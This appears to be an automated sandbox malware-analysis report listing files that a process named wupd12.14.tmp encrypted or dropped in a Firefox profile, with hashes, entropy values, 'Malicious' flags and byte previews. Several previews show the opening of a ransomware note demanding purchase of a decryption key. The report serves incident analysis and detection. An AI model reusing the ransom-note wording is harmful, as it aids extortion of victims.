Preview:	.Q.gd:.>.<...........)...o`.....E../.0.z..,)}...2..!..Gt.7..........t..{..[/.3...S.(.Q.@O....b/[.......VUui;G.(t,_.,.Q..<^J...[Y^.n... ..H...h...m...t.'z...+...xl(.}$...?..E......%...6)3`_:.Z...b...w..l)ibs.$F....i#.....4..GNT..5..%*....I.......f.af...$..#..N.c...P.....Z...n.....p.v.. ..n...joyE.....D.0&^L...............r.Y...2`..Lr...8.lU.K..H3E.i...........]"2..g.`Z....E.;.y5O.......J.dz....b......_..E..=..F/.......]hj?<....Mhy..3...y.V..L.%.A..@.k.....^<......]n.......fU......=....b.....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.270368124884571
Encrypted:	false
MD5:	231A36D2182FA3D3DE2D67D9A371E944
SHA1:	26CB35941F47DADE877305163A7AB70F4EB73F16
SHA-256:	1626BF371721362EA079E908C8113134412E34D5991AD943E30240B3F98EC3D7
SHA-512:	0629FD69470A813A81B9B5A2A0682ABC60AA3853B512D1A048A1B75EC47F38FA30D9FBED719E0636D1187FABB0C80DD82981116D5984A31607C1F361AC5A3ADB
Malicious:	true
Preview:	...].....7..1.>.o.."i..N.M..l .G.............~..[...3.B.w.......8'9X3...I.r+.....P......8........_......4.A....$..o(....)_.. w.4.)..R.....S..d.C....g..G.Qb..{...!..3....l.-q.Z.........P...U.91N]]e.........n.. .7/..P.59.A 9-.j`d.E....p0.Q?.....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	36752
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	DD507F9F474F821FEF28D4BE121FF6FF
SHA1:	CE9F35A9FD98C71F7ECDE1EAA9BE022F35E5AEA6
SHA-256:	D38AD86F8AC32279BC30D2B832AD2CFD6ABE708F3DBA9575B2B30EF3D78E934A
SHA-512:	65396D5107E23015C429C0E58730A673C38B9A06F98C91F097D664F11A86C2BCA4A837AC03999DE69CE2B956721E6D194E57526D6EFA5DE267134E50C979E92F
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.80788608270587
Encrypted:	false
MD5:	EC33D8FF5AE0C5054AD980AD2FDAA48B
SHA1:	8078DE367CB5FC7FD1CFF48E534E31B98CE881F4
SHA-256:	8166DD3D3AFCE942A45D62950EB0228ED844D78814906DA3A9EAA6E05FA6A7F9
SHA-512:	AC30A106C552B43CCCB3DF8DD5A03A2A1D10991494AB44DC2BD4C2CDC3FAAA94FA06F65C36CD524429DEF20885BF19F01CB65DB26C75B83C08784BFC7163802C
Malicious:	true
Preview:	..+6.?tUB.u....O..W8..#A..O...j?\,..d.yB.zG......E..}.,K...O...8..P.dPS..T..B.~...+<\....C.C..jAf.$Q..l..0..x@A..z ]..0..L..OJ...a.1..4.r_l.^q2v7FL.MG.f...=w0.KT,..WuM.........wGT.lSu.hH'...kL#Iz..8..p.A..K..~.g~]..p...}....+UvXM....{.l...q......{......f.af+'..D."<.#......U.T....f..:.S.....G.......1.....5.iM..)j...9B.Ic.'.......a~v".hWLy.z).....1AU...).j.<.....'.Dvs..y.d..<.V%....c.....lh.e.'F.-.....J"Z..o........8..&..6e)n.S.8..n..q..W$.)...Yo.F*.x......a.94......Y...Z..8.l.^.O..j=......%dX\=H\....f.af4........a....^0I......7R.!.9}.<Z.R.<<$t_;5\|..7.o_X....J....q..d.!{..xg.Y..(..v..Ll...(.A.6.a...E...../.TN.3...5.l.M..<n......].K].d.'SlF..!.....b.8[...w@e...T........a.M....<.+.i.s.f.)gI&..}+ ...+..!..Y.gIlq.Z..`AkAvH.vT....e.......`.......f.af.5r.`.Vq.%.9h.>..../-.~..4.L..I)...!4....7i.&.iJ......@qJ.1....7q..q.`....<.$6.I.T9k0_3i..JC.uo...!..0..).a!........'..,.....I....._..1.Ru.h.@tV.N6c...?..DC=...'.......3..C.F\|..T.S.....5.......

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.150732485015352
Encrypted:	false
MD5:	03D7BD38F19216CD617FDD59DBB9822D
SHA1:	0E2BD400B9F1DE20909B951E35EEDFF18CC45880
SHA-256:	7E532158EBB1E369C5E04C4069DBE196D075208A53565D81F82047D8F2C303EA
SHA-512:	B5E95D6D75FC8A38C5022DA9D27AB5E01C247ACA5619CD710B7CAAF9BACF93D68CF448C3B70FEF69872D5749049B88F1DD173AC9AF18243DF99B12C1395BEA75
Malicious:	true
Preview:	......F...o.......MnJ......{v...O5!'t.5L.S.{.1..e..p..)g.1.i..I\|JG.....<....\|'.F.....B.......h7..........UC...w....^...We._...\......zf..[P...T.F.j"...R~<z.....C.A.Q\....C..>.G......fv.}&....~....>.&[#..nH..(}.T..T9.Q{.(pn.!-^.?....NOU..R..~......f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	10486024
Entropy (8bit):	7.999983957977052
Encrypted:	true
MD5:	DF31E5F0EB8F5ADF4958C15C8C5383A8
SHA1:	03708638E19AE1E06B0F7352EC33F62CF23CC267
SHA-256:	4480CA64F4302F64070CF6B69155975403C6CDAB56A9B51C27694D0EE54F75C5
SHA-512:	BDE2AF31760D6C208964CE0713EA7D2AD990D2D9B07C04F4F4BE7F7E872A36B61FC3E8D20ACE50A27CC1126C1E7ECB045DD13287D181E6DD9FD6B28F7BF8BA1B
Malicious:	true
Preview:	..V.E.{....6!.:z.......rN.7:........+..[d7...%W..b.DS...\|.Wm.&].SP.r.e...{.O).A.......+..0o.Q.(.S3.ZvJ".....e.s....O...~'A.8gI.a.9<......u..<:..3........x..b.@9>....+._.....i_...}.I...Xh....../u..Rg0G.+.. )......+....d..c.)F..3c!L._...".w..W..B..G.R....Q%n.#..U.7k.'....,.......S..I..J..3."..]...W;.E...........e..._#.\.......K....r.1.P....t..B..?..".}$<....;.D......C..R..&...<..w.xk.Gi.O#%......E.-..\(.^.6.....W.GS.B~u\|...D..k.....@o..].>............5...0...r....N...T[.O..p.4...q..?A.HB..y.7~m...a...RE.\m.....U.VG....,.....7?4.[...i.q.:.Ssjj.e.(..U.\|V......../.....?E..e%..q...-.+b.ti.,..?{...4.%).2..QP..O...k-..v.C..3.z.&d...?...8k._.X.k..?8V.x...o.3"....x.G1g.....=Wbe.........,*.D..).VJ4...6sFm.Y^.p.^!.M..h..`.4!.o{.c.w....U^.F.....?M......D..qQ..d .B\|&..u.a...U...C..G9y?.;.Y$..j...l5.<..+.<;.T...`#....0.>..Y...d:.Q.l.6DC&..]..{+.&...zV.;...n`....V.......L.O$.4.M.=.yk.....I..+..z.EB/.>..........sV5...D... ...s.....)..q..O

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	792
Entropy (8bit):	7.686005239401065
Encrypted:	false
MD5:	787E7B5853C32A07821CEFBE09C3EA48
SHA1:	889792672B4D11839865DF6CF5D90CA50C69B955
SHA-256:	D9545D06597A36BEEF3146C0D554DAAC493A726955B59606C19B7B3E41C80D34
SHA-512:	4BB4D730888352B0D5E11209A11AC0D3B9D4160BA9B4BBDD44E3804B0F3B9E9972C6A853FFAA7DB6A5914E4E0A3D01A359340027889D363618C96A724FB6B961
Malicious:	true
Preview:	...t\LKg.{.i,A.g..Y...t..(H.1....s..r....c.d..^.[..../......H..=.)F..........\bf^...+.a2.~e...R\..D.e....cW3.{........6..3.\|...`E..........(....M....\....6./..pU....v.......s.....;..a..........+.UiA..+..YLO..d....<....$J..V....cz....@..\.M..oai....f.af..zF{.VlK$.k....D.A..~....}......0......d.....gL..a.=IN.%........DW`....J..)>..O!.c...k..2.UO...x...=."O.....z...A_.U....;\|=..n/}.N.....!b..=.v......`.......+8....}R[./.d.......i.K...^#a8......a.L......8..c..[..P`GxZ.!...l...K9.QaX.~..K......f.af&tF......0^4..G\|r'Y.N7.A..<.....G>.,B..-....S.k..[."..n.Q...nR...`../...... &.@....o..g`\|...+...\9..5.;c_.".i.[..S.x{1.1...K...Bc.L..`o......n....bK..%....e.....P.(......E.k...LI..fu....9n(.+U..D..T3.xj.Pl...{=_O[nMz..u.. .......H.~V.u..r....F....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1848
Entropy (8bit):	7.864942094904916
Encrypted:	false
MD5:	A10440049523236131129B63825E5577
SHA1:	DB3CC03800249D6D7868AAB250C3BFCE2EA5667D
SHA-256:	708767EEF940D2C2213D4AF99E27F3233A81CDA84F31ECBADD9926033E63C429
SHA-512:	89ABB9EEBD6A02AD363C3B0E66FD5886A23A26C57AE15528DCDCD742FFD8D3F6382F7754CF1A07B10D4C3795CC983CB132D1CB95F89EF4B758733A4B8B768FC2
Malicious:	true
Preview:	<..C....}...?..e.xPEf.}.fh......%...l.\|.-@4..$%..2.....G...b.etF.8..rG..(...B.;.....X:...>d....N\..T..=F.Z.m..$..w.)z..O.oE..g..Q.t.{..e....`.=f.......\|Q?.u.Y2..q..(....... ..g.}?._.-...).[.......w.G..4.en...Y...D...{i.......\..sz_.5(.R.D.......f.aft..u..>.".:G....j..v.N.....)..vJ....[.,#.....m9.S...3...U(....!.i......PSD..t<{...B..]/4.efJ7.A....)G..2..H[...r.{....H.{.7.Z3.....-`9..c....x....h6.F.[\...p.2.`.<..^.a..."..g..\|.#..na._vn.......\Q,p.1.....T..2.e9V.....Y{p..{...{..w....&~..K.....f.af<....v.u..]i..:........]t.....p.,..9.....D....}..L$..{....4..#...Y..j.........].P@;...l. .L\[.5...-+5@]...q.g.......%..mZ.......<.....nN+.8....}>F.:.7D.t7...........k.0.R...><c....m.T....R]..P&.8.(m.z.ip.mS.O...H..`..rs+\..&....;.k.)."y.f.Qk....f.af.wq.V..\..{.R.D.W.Y..k".Q.....E...\...d.._...".'r.Xn.MI.....\|G.2ujf.h..)`.n...Lz.a.....~.Q..#....3.rpj^....rR.zE;......YdQW..5.].T....d.Bg..g=....D.'..z...X....W.q.?..x..T_.yi_..j$.....GK./uB"fn..a..L

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.784004074363533
Encrypted:	false
MD5:	1996F01ACEB740789C3581600F5D3AF7
SHA1:	0A15C427951AD3F7EDF49DE44CCFC5C762F693F7
SHA-256:	D454C2E3F138E2A4C74E641F49C9F4A9CEA216477E2A8B27B08AEA4C9548ABAC
SHA-512:	C781E4392AE9402A00ED0AEA36B6FF66870D7B8BBACD2CD16FA8B78D96E851B162A5797DA759575698E8D469AEA3F4A4EBBCAE1DC19360D872A01FD4D6510DE8
Malicious:	true
Preview:	..z....g.Gh.....Be.....$8.....h....KU...:......6....IK.V...m!.....k...&...o..\|.6kY.=..=...:...IM.....h.00..........A..d[.".........sG..xR....c..td.u...8..x..p..R.....o3s.=.x ...P.....=.........6......_}..)\.....U..6.n...BF.....m.g.]..Q.....ZN....f.af.d8....hI...X4..(.....6.C..^{~.W.F..v?.k......=.~.cv..9.`.n...O.6.<..>D.i..........9Sz,=^....Z....(.....^.\......=..q.w.....>.e..RV ?e.1.h.;.......J......f.D=x..Q....r6......#.e.T.~/.__O.I.;2...r.....2..2... ....>z......).B..hSQ...Q.....&7..........f.af..i3.x.GI4.O...D.M..11.`'.Z...(2...Gdc.....Q..M..'....DJ8.1.....TS...#\..Ip.+.l)W#..A....U....VQ?.`I.....P..\|mu2n.........(..)..:d...V.\#...[...............-~Dq2.....D.=....B."&.8..."...X.f.....S.[EK/.e..$$...J.L...N.O...e.g.r.....m....b..CMa....f.afx....(...... ~...&.....G.:.$..I..-.,...m/..Z.4....].++;.i..M$...@P..1.o&%$.s..{R"D..U/.-...Z&/#b...-..e...7s...?M......,x.F.VJ.Jb...SOw..5...K`.........+5.p..2-.C+.......)....;8.Y..%.4.eu.S..zP.*..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. 